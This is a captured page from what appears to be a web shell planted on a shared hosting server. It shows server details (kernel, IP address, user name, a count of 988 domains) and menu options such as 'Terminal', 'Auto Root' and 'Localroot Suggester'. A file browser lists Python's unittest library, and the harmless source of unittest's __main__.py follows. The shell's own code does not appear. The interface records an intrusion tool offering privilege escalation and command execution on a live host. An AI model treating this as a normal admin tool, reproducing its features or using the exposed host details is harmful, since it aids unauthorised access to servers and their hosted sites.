Linux evo.fastest-server.com 5.14.0-284.1101.el9.tuxcare.11.els11.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 14 13:30:35 UTC 2026 x86_64
LiteSpeed
Server IP : 103.249.112.113 & Your IP : 216.73.217.135
Domains : 988 Domain
User : tanishks
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
python36 /
lib64 /
python3.6 /
unittest /
Delete
Unzip
Name
Size
Permission
Date
Action
__pycache__
[ DIR ]
drwxr-xr-x
2026-09-04 12:14
__init__.py
3.13
KB
-rw-r--r--
2024-04-17 17:32
__main__.py
485
B
-rw-r--r--
2024-04-17 17:32
case.py
56.84
KB
-rw-r--r--
2024-04-17 17:32
loader.py
21.7
KB
-rw-r--r--
2024-04-17 17:32
main.py
10.3
KB
-rw-r--r--
2024-04-17 17:32
mock.py
77.98
KB
-rw-r--r--
2024-04-17 17:32
result.py
7.27
KB
-rw-r--r--
2024-04-17 17:32
runner.py
7.57
KB
-rw-r--r--
2024-04-17 17:32
signals.py
2.35
KB
-rw-r--r--
2024-04-17 17:32
suite.py
10.23
KB
-rw-r--r--
2024-04-17 17:32
util.py
5.31
KB
-rw-r--r--
2024-04-17 17:32
Save
Rename
"""Main entry point""" import sys if sys.argv[0].endswith("__main__.py"): import os.path # We change sys.argv[0] to make help message more useful # use executable without path, unquoted # (it's just a hint anyway) # (if you have spaces in your executable you get what you deserve!) executable = os.path.basename(sys.executable) sys.argv[0] = executable + " -m unittest" del os __unittest = True from .main import main, TestProgram main(module=None)